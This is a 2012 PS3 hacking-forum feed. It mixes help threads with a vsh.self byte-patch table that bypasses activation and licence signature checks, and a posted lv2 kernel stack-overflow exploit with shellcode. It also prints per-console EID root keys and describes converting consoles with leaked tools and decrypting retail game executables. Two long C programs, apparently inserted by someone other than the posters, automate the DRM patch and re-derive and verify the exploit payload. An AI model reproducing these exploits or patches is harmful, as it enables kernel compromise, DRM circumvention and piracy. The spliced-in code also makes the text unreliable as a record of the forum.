Crunching the Latest PS3 Scene News! - PS3 Technical Only Topics
http://www.ps3crunch.net/forum/
Here developers talk about very technical subjects, so no idle chatter please!
Feed generated Fri, 09 Nov 2012 00:55:15 GMT

help to enter Recovery Mode on Rogero 3.55 CEX CFW v3.6
http://www.ps3crunch.net/forum/threads/5403-help-to-enter-Recovery-Mode-on-Rogero-3-55-CEX-CFW-v3-6?goto=newpost
Tue, 06 Nov 2012 15:25:47 GMT

Hi all,

Why can't I enter Recovery Mode on Rogero 3.55 CEX CFW v3.6? I've tried many times, still no luck.
I want to return to OFW 3.55 and then go to REBUG 3.55.3 REX.
Please help.

a. Turn off the PlayStation 3.
b. Turn it on and keep holding the power button down; the system will turn on BUT DON'T turn it off again.
c. Once the system has shut down, turn it on again and keep holding the power button down (you will hear 1 beep first; keep holding) until you hear 2 consecutive beeps.
d. When you hear the 2 beeps, take your finger off the power button.
e. You will be prompted to plug in your controller via USB and then hit the PS button.
f. The Recovery menu will pop up.
g. The last option, #6 "System Update", is the one you must use.
Posted by thien in PS3 Technical Only Topics: http://www.ps3crunch.net/forum/threads/5403-help-to-enter-Recovery-Mode-on-Rogero-3-55-CEX-CFW-v3-6
430 vsh.self decrypted by me
http://www.ps3crunch.net/forum/threads/5298-430-vsh-self-decrypted-by-me?goto=newpost
Wed, 31 Oct 2012 20:05:42 GMT

4.30 VSH.elf

https://anonfiles.com/file/73e5de9384a8f9b3c3771b7d89e12951


The old way to patch vsh.self was as follows (I don't know if this still applies):

patch 8 bytes in vsh.self for reActPSN
==========================================
version     addr      old data        new data      function
3.55retail  0x30b230  4b cf 5b 45  -> 38 60 00 00   // fixed: allow unsigned act.dat / *.rif
3.55retail  0x30ac90  48 31 b4 65  -> 38 60 00 00   // fixed: act.dat missing after reboot

3.55debug   0x312308  4b ce ea 6d  -> 38 60 00 00   // fixed: allow unsigned act.dat / *.rif
3.55debug   0x311d68  48 31 b7 d5  -> 38 60 00 00   // fixed: act.dat missing after reboot

3.41retail  0x305dc4  4b cf af b1  -> 38 60 00 00   // fixed: allow unsigned act.dat / *.rif
3.41retail  0x305824  48 31 43 ad  -> 38 60 00 00   // fixed: act.dat missing after reboot

3.41debug   0x30cedc  4b cf 3e 99  -> 38 60 00 00   // fixed: allow unsigned act.dat / *.rif
3.41debug   0x30c93c  48 31 47 1d  -> 38 60 00 00   // fixed: act.dat missing after reboot

==============patch vsh.self yourself for a new CFW=====
run dev_blind
copy /dev_blind/vsh/module/vsh.self to d:/vsh/vsh.self.0
cd d:/vsh
unself vsh.self.0 vsh.self.elf

hexedit vsh.self.elf
if *(addr) == old data then *(addr) = new data
only 2 addrs, 8 bytes of data, are fixed in one vsh.self.elf

self_rebuilder vsh.self.elf vsh.self vsh.self.0
copy vsh.self to /dev_blind/vsh/module/vsh.self
Posted by PatrickBatman in PS3 Technical Only Topics: http://www.ps3crunch.net/forum/threads/5298-430-vsh-self-decrypted-by-me
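As an added example (not PatrickBatman's code, nor any tool from the post), the C program below applies the reActPSN table above to a decrypted vsh.self ELF in memory, the way the "if *(addr) == old data then *(addr) = new data" step describes, but with the checks a practitioner wants: it first works out which firmware's table the image actually matches (which is also the answer to "does this still apply" for a 4.30 dump: if no table matches, the offsets have moved and the table must not be used), verifies every entry before writing a single byte, and treats an image that already carries 38 60 00 00 as done. The offsets and bytes are exactly the posted ones; the file-level I/O and the function names are this example's own. The bytes themselves are readable: 38 60 00 00 is `li r3,0`, and each old value starts with 0x48 or 0x4B, i.e. a PowerPC I-form branch with LK=1 (`bl`), so the patch replaces the call into the check routine with a zero return.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct vsh_patch {
    const char *fw;      /* firmware the offsets belong to */
    uint32_t    addr;    /* file offset in the decrypted vsh.self ELF */
    uint8_t     old[4];  /* expected bytes: a `bl` into the check routine */
    uint8_t     new_[4]; /* replacement: 38 60 00 00 = `li r3,0` */
    const char *why;
};

/* The table from the post. Every old value is a `bl` (opcode 18, LK=1);
 * `li r3,0` in its place makes the caller see a zero result without the
 * activation/signature check ever running. */
static const struct vsh_patch PATCHES[] = {
    {"3.55retail", 0x30b230, {0x4b,0xcf,0x5b,0x45}, {0x38,0x60,0x00,0x00}, "allow unsigned act.dat/*.rif"},
    {"3.55retail", 0x30ac90, {0x48,0x31,0xb4,0x65}, {0x38,0x60,0x00,0x00}, "act.dat missing after reboot"},
    {"3.55debug",  0x312308, {0x4b,0xce,0xea,0x6d}, {0x38,0x60,0x00,0x00}, "allow unsigned act.dat/*.rif"},
    {"3.55debug",  0x311d68, {0x48,0x31,0xb7,0xd5}, {0x38,0x60,0x00,0x00}, "act.dat missing after reboot"},
    {"3.41retail", 0x305dc4, {0x4b,0xcf,0xaf,0xb1}, {0x38,0x60,0x00,0x00}, "allow unsigned act.dat/*.rif"},
    {"3.41retail", 0x305824, {0x48,0x31,0x43,0xad}, {0x38,0x60,0x00,0x00}, "act.dat missing after reboot"},
    {"3.41debug",  0x30cedc, {0x4b,0xcf,0x3e,0x99}, {0x38,0x60,0x00,0x00}, "allow unsigned act.dat/*.rif"},
    {"3.41debug",  0x30c93c, {0x48,0x31,0x47,0x1d}, {0x38,0x60,0x00,0x00}, "act.dat missing after reboot"},
};
#define NPATCHES (sizeof PATCHES / sizeof PATCHES[0])

/* Does every entry of fw's table carry its old bytes in this image? */
static int table_matches(const uint8_t *elf, size_t len, const char *fw)
{
    for (size_t j = 0; j < NPATCHES; j++) {
        const struct vsh_patch *p = &PATCHES[j];
        if (strcmp(p->fw, fw) != 0) continue;
        if ((size_t)p->addr + 4 > len || memcmp(elf + p->addr, p->old, 4) != 0) return 0;
    }
    return 1;
}

/* Name of the firmware whose table fits the image, or NULL when none does:
 * either the offsets moved (a newer vsh.self) or the image is already patched. */
static const char *detect_fw(const uint8_t *elf, size_t len)
{
    for (size_t i = 0; i < NPATCHES; i++)
        if (table_matches(elf, len, PATCHES[i].fw)) return PATCHES[i].fw;
    return NULL;
}

/* Apply fw's table in place. Every entry is verified before any byte is
 * written, so a wrong image stays untouched. Returns the number of entries
 * written (0 = already patched), or -1 when an entry holds neither the old
 * nor the new bytes, or lies outside the image. */
static int apply_patches(uint8_t *elf, size_t len, const char *fw)
{
    for (size_t i = 0; i < NPATCHES; i++) {
        const struct vsh_patch *p = &PATCHES[i];
        if (strcmp(p->fw, fw) != 0) continue;
        if ((size_t)p->addr + 4 > len) return -1;
        if (memcmp(elf + p->addr, p->new_, 4) == 0) continue;  /* this one is done */
        if (memcmp(elf + p->addr, p->old, 4) != 0) return -1;  /* not the expected bl */
    }
    int done = 0;
    for (size_t i = 0; i < NPATCHES; i++) {
        const struct vsh_patch *p = &PATCHES[i];
        if (strcmp(p->fw, fw) != 0 || memcmp(elf + p->addr, p->old, 4) != 0) continue;
        memcpy(elf + p->addr, p->new_, 4);
        printf("%s 0x%06x: %s\n", p->fw, (unsigned)p->addr, p->why);
        done++;
    }
    return done;
}

/* Usage: vshpatch vsh.self.elf   (rewrites the file in place; the unself and
 * self_rebuilder steps around it are as in the post). */
int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s vsh.self.elf\n", argv[0]); return 2; }
    FILE *f = fopen(argv[1], "r+b");
    if (!f) { perror(argv[1]); return 1; }
    fseek(f, 0, SEEK_END);
    long len = ftell(f);
    rewind(f);
    uint8_t *elf = len > 0 ? malloc((size_t)len) : NULL;
    if (!elf || fread(elf, 1, (size_t)len, f) != (size_t)len) { perror("read"); return 1; }
    const char *fw = detect_fw(elf, (size_t)len);
    if (!fw) { fprintf(stderr, "no table matches: offsets differ or already patched\n"); return 1; }
    int n = apply_patches(elf, (size_t)len, fw);
    if (n > 0) { rewind(f); fwrite(elf, 1, (size_t)len, f); }
    printf("%s: %d patch(es) written\n", fw, n);
    fclose(f);
    free(elf);
    return n < 0;
}
```

Run it on the vsh.self.elf produced by unself; if it reports that no table matches, stop and rebuild nothing, because a vsh.self from a later firmware simply has the checks at different offsets.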
Need help on FTP
http://www.ps3crunch.net/forum/threads/5288-Need-help-on-FTP?goto=newpost
Wed, 31 Oct 2012 10:20:20 GMT

Hi guys, I need help FTPing a file from the PS3 to my PC. I use FileZilla and did all the steps of the tutorial, but I still get "connection timed out". What did I do wrong? I have two local connections, one to the PS3 and the other to the router. Please help.

Internet Protocol Version 4

Local Area Connection
Use the following IP address:
IP address: 10.1.1.1
Subnet mask: 255.255.255.0
Default gateway: 10.1.1.0

Use the following DNS server addresses:
10.1.1.100

PS3
MMCM FTP is enabled (no timeout)

PS: Do I need to use blackbox? Any tutorial for it?
Posted by nemo in PS3 Technical Only Topics: http://www.ps3crunch.net/forum/threads/5288-Need-help-on-FTP
Where's the dump TB disks tutorial?
http://www.ps3crunch.net/forum/threads/5281-Where-s-the-dump-TB-disks-tutorial?goto=newpost
Wed, 31 Oct 2012 00:41:31 GMT

Hey guys, I remember a tutorial on how to dump TB disks by Grav0x, but I can't seem to find it. Can someone help me here?

I need it since I updated to 4.30 CFW and obviously my Resistance 3 TB disk isn't going to work, so I'm looking for a method of dumping and decrypting the disk. I already tried the PS3GEN tools on the disk, but they can neither read nor decrypt it.
Posted by Beibars in PS3 Technical Only Topics: http://www.ps3crunch.net/forum/threads/5281-Where-s-the-dump-TB-disks-tutorial
Desperate for help!! cant dump eEID_root Key. DEX to CEX QAQ begging for help TAT
http://www.ps3crunch.net/forum/threads/5225-Desperate-for-help!!-cant-dump-eEID_root-Key-DEX-to-CEX-QAQ-begging-for-help-TAT?goto=newpost
Sun, 28 Oct 2012 19:12:53 GMT

Hey, I'm currently on a DEX 3.55 Rogero CFW.
I was trying to get back to CEX. However, I lost my CEX flash due to my flash drive being stolen/lost.

I'm trying to get back to CEX using the following method, by gDrive:

http://www.ps3crunch.net/forum/print...3&pp=10&page=2

However, I could not get my root key with flatz's EID root key application RKDumper... it goes to a black screen forever (without any USB plugged in while starting the application).
I've tried several DEX MFWs, but it doesn't work, still a black screen forever. I have barely slept.
Then I tried to install a Linux system on my DEX, but failed...

What I do know how to do is use mM or MemDump to make flash/lv1/lv2 dumps, an eEID storage dump and a flash storage dump.

I can provide my DEX flash bin if needed...

I don't wanna stay on DEX forever..
HELP TAT, any help is much appreciated!!!!



********************************************************
OK, so I installed the XMB eEID dumper; I have about 6 files, only one of which is 48 bytes.

I got the following:

Microsoft Windows [Version 6.1.7600]

C:\Users\Administrator>cd C:\

C:\>c2d.exe EID4.bin DEX.NORBIN Cex.bin.NORBIN 84
Can't find openssl.exe in c:\openssl\bin or d:\openssl\bin

C:\>c2d.exe EID4.bin DEX.NORBIN Cex.bin.NORBIN 84

EID key : 48 bytes (EID4.bin)
Flash size : 16 MB NOR (DEX.NORBIN)
Target ID : $82

EID ROOT KEY: D6359F1A41B1BD0FE9E548E9EBFE453216676E22E4BF46CB5542A24646568887
EID ROOT IV : BA9409B91BDFC8CA66DCB15D60D44B12

EID0 KEY : B8CC5AC7CA9D14B4B64C3F43EDA4CF1566AA8EC65C73B98B18F5C796E117935A
EID0 IV : DF245C978DE12FBB6D49A80F1329C0B0

EID0 SEC KEY: A315A0487B519E0DDA940870A464C3E1

ERROR: Cannot decrypt EID0 SECTION!

C:\>
Posted by demonHannah in PS3 Technical Only Topics: http://www.ps3crunch.net/forum/threads/5225-Desperate-for-help!!-cant-dump-eEID_root-Key-DEX-to-CEX-QAQ-begging-for-help-TAT
Debugging tools
http://www.ps3crunch.net/forum/threads/5119-Debugging-tools?goto=newpost
Wed, 24 Oct 2012 01:55:48 GMT

Hi Crunch Team,

I've been following the scene for a while now but only recently got a PS3, and I would like to start doing some debugging and coding on it. Unfortunately it's on 4.25, but I'd like to start studying the firmware files for now anyway. Most of my experience is in debugging x86/win32, so I imagine there will be a bit of a learning curve familiarizing myself with the relevant PPC instructions.

The devwiki looks like a great resource, but any other recommended info/documentation would be appreciated. Thanks!
Posted by *M* in PS3 Technical Only Topics: http://www.ps3crunch.net/forum/threads/5119-Debugging-tools
Installing Linux Problem
http://www.ps3crunch.net/forum/threads/5085-Installing-Linux-Problem?goto=newpost
Mon, 22 Oct 2012 12:20:44 GMT

Hi there,

I'm trying to install red_ribbon_rc6 on my 3.55 PS3.
I have encountered TOO many problems to count, and right now I have gotten to the part where I am in petitboot and have entered "cd /tmp/petitboot/mnt/sda1/"
and "./create_hdd_region.sh", but when I re-reboot it just gives me the same options of "boot gameOS, Set video mode and exit to shell".
What on earth can I do? I am using a Fat NOR on Rebug 3.55.2 with a 20 GB partition.

The problem has something to do with this:

So when I have written cd /tmp/petitboot/mnt/sda1/
and ./create_hdd_region.sh my screen should look like this:
(attached image: 38888d1350906126-killing-me-please-help-should-look-like-.png)

But it looks like this:
(attached image: 38889d1350906288-killing-me-please-help-dsc00957.jpg)

Any ideas?
Thanks
Posted by otherchris in PS3 Technical Only Topics: http://www.ps3crunch.net/forum/threads/5085-Installing-Linux-Problem
New homebrew release: REQUEST IDPS Generator - v1.0.0.0 by Rnd
http://www.ps3crunch.net/forum/threads/5016-New-homebrew-release-REQUEST-IDPS-Generator-v1-0-0-0-by-Rnd?goto=newpost
Tue, 16 Oct 2012 10:21:20 GMT

Hello,
A long time ago, when the CEX2DEX story was started by Math, he asked everybody who wanted to convert their console from a retail console [CEX] to a debug/test console [DEX] to send him some info from the console, obtained with the leaked ObjectiveSuite tools, so that he could generate the IDPS_REQUEST.txt file required to convert our consoles to DEX with these tools via Sony's official servers, since he was able to access those servers to generate the required files.


(Attachment 3400)


Today PlayStation 3 homebrew developer Rnd (aka RndRandomizer) has released a Request IDPS Generator version 1.0.0.0 with details below.

Quote:

From the ReadMe file: REQUEST IDPS Generator - v1.0.0.0 - Rnd

v1.0.0.0:

Initial Release

Features:

Generate a request_idps file
Get PerConsole Data (board ID, cid, ecid, kiban ID, ckp2_data, ckp_management_id)

Usage:

Just get your NAND/NOR dump and drop it in this application.

No more need to re-flash the whole dump in order to convert the EID.

Simply put, it makes it easier to use with ObjectiveSuites-SetIdps, and you don't have to gather it from Sony's server.

Put request_idps.txt in the Temp folder in ObjectiveSuites to set your request_idps, and you are done with flashing the new EID.

I'm not responsible for ANY DAMAGE it may cause! USE AT YOUR OWN RISK!

P.S. If somebody has a script to get the EID with ObjectiveSuites, it would be very kind of you to let me know; I will update the application.

Sincerely,
Rnd

Contact me at RndRandomizer
Download: PS3 Request IDPS Generator v1.0.0.0.

Source: PS3News.
Posted by Abkarino in PS3 Technical Only Topics: http://www.ps3crunch.net/forum/threads/5016-New-homebrew-release-REQUEST-IDPS-Generator-v1-0-0-0-by-Rnd
60 gig launch console just died :-(
http://www.ps3crunch.net/forum/threads/4933-60-gig-launch-console-just-died-(?goto=newpost
Sat, 06 Oct 2012 02:52:19 GMT

My 60 gig PS3, which I got as soon as it launched, has just given up on life, turned off and flashed a red light.

Is there any way to fix this?

If not, I have no issue with buying a new one, as long as I can get my save games back.

If I take the HD out of my dead PS3, plug it into a computer and back up all the files, will I be able to plug it into the USB port on a new PS3 and copy my save games onto it?

And all my PS+ files, do I just have to re-download those?

aaannnddd my Sleeping Dogs disc is still in this PS3. I read that if you hold down eject and turn it on and tap eject the disc should spit out, but it doesn't do that for me.
Posted by zomble in PS3 Technical Only Topics: http://www.ps3crunch.net/forum/threads/4933-60-gig-launch-console-just-died-(
Naehrwert released PS3 LV2_Kernel Exploit Sample Implementation
http://www.ps3crunch.net/forum/threads/4765-Naehrwert-released-PS3-LV2_Kernel-Exploit-Sample-Implementation?goto=newpost
Thu, 20 Sep 2012 15:20:00 GMT

Today the well-known PS3 developer/hacker Naehrwert, known for his great tools like SCETool and Libeid and also for his reverse engineering work on the PS3 system, has made a blog post about lv2 exploiting that will work on all current firmwares up to the latest one from Sony, OFW 4.25.

To quote from his blog:

Quote:

A long while ago KaKaRoTo pointed me to a stack overflow he found while reversing lv2_kernel. But there are two problems:

  1. The vulnerability is in a protected syscall (the SELF calling it has got to have the 0x40… control flags set). So you'd first need to find a suitable usermode exploit (don't ask us) that gives you code execution with the right privileges.
  2. The payload data is copied to the lv2 heap first and the function will do a free call on it before the payload has any chance to get executed. This might not sound like a problem, but it looks like lv2's heap implementation will overwrite the freed space with 0xABADCAFE and thus destroy the payload.

Here is my sample implementation for 3.41 lv2_kernel (although the vulnerability should be present in all versions of lv2 up to the latest firmware); maybe someone of you will find a way to overcome problem (2.) and can get something nice out of it, because right now it's only good for crashing lv2.

And this is his PS3 LV2_Kernel exploit sample implementation:

Code:

/*
* lv2 sys_mount stack overflow
* Original finder: KaKaRoTo (thank you for pointing it out!)
* Note: all offsets/values/addrs in this source are 3.41 specific
*/

#include <stdio.h>
#include <ppu-types.h>
#include <ppu-lv2.h>

/*
unk2, unk3 is what we're going to use here.
lv2 will handle unk2, unk3 like this:
char *strlist[FIXED_SIZE]; //On stack.
for(i = 0; i < unk3; i++)
        strlist[i] = strdup_from_uspace(*unk2++);
*/
static s64 sys_mount(const char *dev /*r3*/, const char *fs /*r4*/, const char *path /*r5*/,
        u64 unk0 /*r6*/, u64 wp /*r7*/, u64 unk1 /*r8*/, const char **unk2 /*r9*/, u64 unk3 /*r10*/)
{
        lv2syscall8(837, (u64)dev, (u64)fs, (u64)path,
                (u64)unk0, (u64)wp, (u64)unk1, (u64)unk2, (u64)unk3);
        return_to_user_prog(s64);
}

//For testing.
static void patch_access_check()
{
        //check_access @ 0x80000000000505D0
        //li r3, 1 ; blr
        lv2syscall2(7, 0x80000000000505D0ULL, 0x386000014E800020ULL);
        printf("[*] DEBUG: access check patched.\n");
}

int main(int argc, const char **argv)
{
        //Problem: The mount syscall needs the 0x40 ctrl flag (root) to be set.
        //Solution: Find a usermode exploit in a SELF that has them set.
       
        //Patch the ctrl flags check for testing.
        patch_access_check();
       
        //Nop.
        char nop[] = "X";
       
        //Payload.
        char payload[] =
        {
                //Insert valid PPC code here (without 0x00 bytes)
                //and hope lv2 heap 0x27 is executable and 0x04 aligned.
                0x38, 0xE0, 0x7E, 0xF0, //li r7, 0x7EF0
                0x38, 0xE7, 0x01, 0x10, //addi  r7, r7, 0x110
                0x78, 0xE7, 0x83, 0xE4, //sldi  r7, r7, 16
                0x78, 0xE7, 0x07, 0xC6, //sldi  r7, r7, 32
                0x60, 0xE7, 0x91, 0x34, //ori  r7, r7, 0x9134
                0x7C, 0xE9, 0x03, 0xA6, //mtctr r7            ; 0x8000000000009134 (sys_sm_shutdown)
                0x38, 0x60, 0x02, 0x10, //li    r3, 0x210
                0x38, 0x63, 0xFF, 0xF0, //addi  r3, r3, -0x10 ; 0x200 (reboot)
                0x7C, 0x84, 0x22, 0x78, //xor  r4, r4, r4    ; 0
                0x7C, 0xA5, 0x2A, 0x78, //xor  r5, r5, r5    ; 0
                0x7C, 0xC6, 0x32, 0x78, //xor  r6, r6, r6    ; 0
                0x4E, 0x80, 0x04, 0x20, //bctr
                //End of payload.
                0x00
        };
       
        //List containing the entries.
        //stack frame size is 0x1C0
        //strlist = framptr + 0xE0
        //remaining stack frame size is 0xE0 (28 * 8)
        #define LIST_LENGTH (28 + 2 + 1)
        const char *list[LIST_LENGTH] =
        {
                //-0xE0
                //Overwrite stack with nop entries (0xE0 bytes).
                nop, nop, nop, nop, nop, nop, nop, nop, //0x40
                nop, nop, nop, nop, nop, nop, nop, nop, //0x80
                nop, nop, nop, nop, nop, nop, nop, nop, //0xC0
                nop, nop, nop, nop,
                //0x00
                //Fill 0x10 bytes to reach saved r0.
                nop, nop,
                //+0x10
                //Overwrite saved r0 with a pointer to our payload.
                payload
        };
       
        //Doit!
        printf("[*] Taking the plunge...\n");
        s64 res = sys_mount("FOO", "BAR", "XXX", 0, 0, 0, list, LIST_LENGTH);
        printf("[*] Error: sys_mount returned (res = 0x%016lX).\n", (u64)res);
       
        return 0;
}

Thanks to Naehrwert for posting this info, and thanks also to KaKaRoTo for the original exploit finding.

News Source:
Naehrwert Blog
PS3News
Posted by Abkarino in PS3 Technical Only Topics: http://www.ps3crunch.net/forum/threads/4765-Naehrwert-released-PS3-LV2_Kernel-Exploit-Sample-Implementation
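As an added example, not part of Naehrwert's post or his code, the C program below re-derives the payload bytes quoted above by hand-encoding each PowerPC instruction (D-form addi/ori, the MD-form rldicr behind the sldi mnemonic, mtspr for mtctr, bcctr for bctr), checks the result for the 0x00 bytes the comment warns about (the list entries reach lv2 through a strdup-from-userspace, so a NUL would cut the payload short), and runs the register-building sequence through a small interpreter to confirm that r7, and so CTR, ends at 0x8000000000009134 and r3 at 0x200 before the bctr. It also shows why the constant is built as `li 0x7EF0` plus `addi 0x110` instead of `li 0x8000`: the direct form encodes as 38 E0 80 00. The instruction encodings are standard Power ISA; the interpreter, the byte order (big-endian, as in the posted char array) and the function names are this example's own assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* D-form addi rD,rA,SIMM (opcode 14); `li rD,SIMM` is addi with rA = 0. */
static uint32_t enc_addi(unsigned rd, unsigned ra, int16_t simm)
{ return (14u << 26) | (rd << 21) | (ra << 16) | (uint16_t)simm; }
/* D-form ori rA,rS,UIMM (opcode 24). */
static uint32_t enc_ori(unsigned ra, unsigned rs, uint16_t uimm)
{ return (24u << 26) | (rs << 21) | (ra << 16) | uimm; }
/* MD-form rldicr rA,rS,sh,me (opcode 30, XO 1): me[0:4] at bits 21-25,
 * me[5] at bit 26, sh[0:4] at bits 16-20, sh[5] at bit 30. */
static uint32_t enc_rldicr(unsigned ra, unsigned rs, unsigned sh, unsigned me)
{ return (30u << 26) | (rs << 21) | (ra << 16) | ((sh & 31) << 11)
       | ((me & 31) << 6) | ((me >> 5) << 5) | (1u << 2) | ((sh >> 5) << 1); }
/* sldi rA,rS,n is the extended mnemonic for rldicr rA,rS,n,63-n. */
static uint32_t enc_sldi(unsigned ra, unsigned rs, unsigned n)
{ return enc_rldicr(ra, rs, n, 63 - n); }
/* X-form xor rA,rS,rB (opcode 31, XO 316). */
static uint32_t enc_xor(unsigned ra, unsigned rs, unsigned rb)
{ return (31u << 26) | (rs << 21) | (ra << 16) | (rb << 11) | (316u << 1); }
/* mtctr rS is mtspr 9,rS (opcode 31, XO 467); SPR 9 lands in bits 11-15. */
static uint32_t enc_mtctr(unsigned rs)
{ return (31u << 26) | (rs << 21) | (9u << 16) | (467u << 1); }
/* bctr is bcctr 20,0,0 (opcode 19, XO 528). */
static uint32_t enc_bctr(void)
{ return (19u << 26) | (20u << 21) | (528u << 1); }

#define PAYLOAD_INSNS 12
/* Assemble the posted payload into big-endian bytes; returns the byte count. */
static size_t build_payload(uint8_t out[PAYLOAD_INSNS * 4])
{
    const uint32_t insns[PAYLOAD_INSNS] = {
        enc_addi(7, 0, 0x7EF0),  /* li r7,0x7EF0: `li r7,0x8000` would be 38 E0 80 00 */
        enc_addi(7, 7, 0x110),   /* r7 = 0x8000 */
        enc_sldi(7, 7, 16),      /* r7 = 0x80000000 */
        enc_sldi(7, 7, 32),      /* r7 = 0x8000000000000000 */
        enc_ori(7, 7, 0x9134),   /* r7 = 0x8000000000009134 (sys_sm_shutdown on 3.41) */
        enc_mtctr(7),
        enc_addi(3, 0, 0x210),
        enc_addi(3, 3, -0x10),   /* r3 = 0x200 (reboot) */
        enc_xor(4, 4, 4), enc_xor(5, 5, 5), enc_xor(6, 6, 6),
        enc_bctr(),
    };
    for (size_t i = 0; i < PAYLOAD_INSNS; i++) {
        out[4 * i]     = (uint8_t)(insns[i] >> 24);
        out[4 * i + 1] = (uint8_t)(insns[i] >> 16);
        out[4 * i + 2] = (uint8_t)(insns[i] >> 8);
        out[4 * i + 3] = (uint8_t)insns[i];
    }
    return PAYLOAD_INSNS * 4;
}

/* strdup stops at the first NUL, so any 0x00 byte truncates the payload. */
static int has_nul(const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++) if (p[i] == 0) return 1;
    return 0;
}

/* Minimal interpreter for the instruction forms used above. Executes the
 * big-endian words until bctr; returns the number of instructions executed,
 * or 0 on an instruction it does not know. */
static size_t run_payload(const uint8_t *p, size_t n, uint64_t r[32], uint64_t *ctr)
{
    size_t count = 0;
    for (size_t off = 0; off + 4 <= n; off += 4, count++) {
        uint32_t w = ((uint32_t)p[off] << 24) | ((uint32_t)p[off + 1] << 16)
                   | ((uint32_t)p[off + 2] << 8) | p[off + 3];
        unsigned op = w >> 26, d = (w >> 21) & 31, a = (w >> 16) & 31, b = (w >> 11) & 31;
        unsigned xo10 = (w >> 1) & 0x3FF;
        if (op == 14)      r[d] = (a ? r[a] : 0) + (uint64_t)(int64_t)(int16_t)(w & 0xFFFF);
        else if (op == 24) r[a] = r[d] | (w & 0xFFFF);
        else if (op == 30 && ((w >> 2) & 7) == 1) {               /* rldicr */
            unsigned sh = b | (((w >> 1) & 1) << 5);
            unsigned me = ((w >> 6) & 31) | (((w >> 5) & 1) << 5);
            uint64_t rot = sh ? (r[d] << sh) | (r[d] >> (64 - sh)) : r[d];
            r[a] = rot & (me == 63 ? ~0ULL : ~0ULL << (63 - me));
        }
        else if (op == 31 && xo10 == 316) r[a] = r[d] ^ r[b];
        else if (op == 31 && xo10 == 467) *ctr = r[d];
        else if (op == 19 && xo10 == 528) return count + 1;       /* bctr: stop */
        else { fprintf(stderr, "unsupported instruction %08x\n", w); return 0; }
    }
    return count;
}

int main(void)
{
    uint8_t buf[PAYLOAD_INSNS * 4];
    uint64_t r[32] = {0}, ctr = 0;
    size_t n = build_payload(buf);
    for (size_t i = 0; i < n; i++) printf("%02X%c", buf[i], (i % 4 == 3) ? '\n' : ' ');
    printf("NUL-free: %s\n", has_nul(buf, n) ? "no" : "yes");
    run_payload(buf, n, r, &ctr);
    printf("CTR=%016llX r3=%llX\n", (unsigned long long)ctr, (unsigned long long)r[3]);
    return 0;
}
```

The same encoders reproduce the `li r3,1 ; blr` pair (38 60 00 01 4E 80 00 20) that patch_access_check() pokes over check_access: that one may contain NUL bytes because it travels through the peek/poke syscall, not through strdup, which is exactly the constraint that differs between the two halves of the sample.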
Debugging full games + sniffing
http://www.ps3crunch.net/forum/threads/4734-Debugging-full-games-sniffing?goto=newpost
Mon, 17 Sep 2012 18:56:16 GMT

I moved the thread here.

I just think there are also other ways to do it, like full game debugging.

I researched this option myself, and I can see there are also several ways to obtain the decrypted eboot.

I really played around today, and I managed to get full game debugging.

And that hasn't been done yet.

It has always frustrated me that you couldn't debug retail eboots/games.

Normally, when loading just the fself in the debugger, nothing happens.

So I played around.

Here is a small tut.

First reset in debugger mode.

Locate the eboot.bin, decrypt it, and resign it with the fself one.

Then in Target Manager set app_home to the BLES or BLUS folder.

Reset target.

Then load executable, then locate the eboot.bin.

Load it.

Then open Tuner from the SDK.

Then load executable there also.

When you do this you get kicked to the PS3 debugger.

Then in the debugger you press Go under options..

Congrats, you are debugging the full game.

movie intro

(Attachment 3312)

gameplay

(Attachment 3313)

Also on the PS3 you can play the game under debugger mode.

Since eboots stay in RAM until the next one is loaded, the entire game can be debugged.

So therefore only the eboot has to be decrypted and not the sprx, if the game OS needs that.

Since a monkey like me can figure it out, so can you.

PS: when the debugging starts you can sniff with "software".

Even works on 4.11 games, but prepare for huge files like 1 GB when sniffing, so I hope for any good suggestions.

I really don't care about wars between sites, just help each other.

The funny thing is that you can debug both TB and Cobra this way, all the updates and dongle updaters; just wish that DEX had been around before :(

regards
Posted by zadow28 in PS3 Technical Only Topics: http://www.ps3crunch.net/forum/threads/4734-Debugging-full-games-sniffing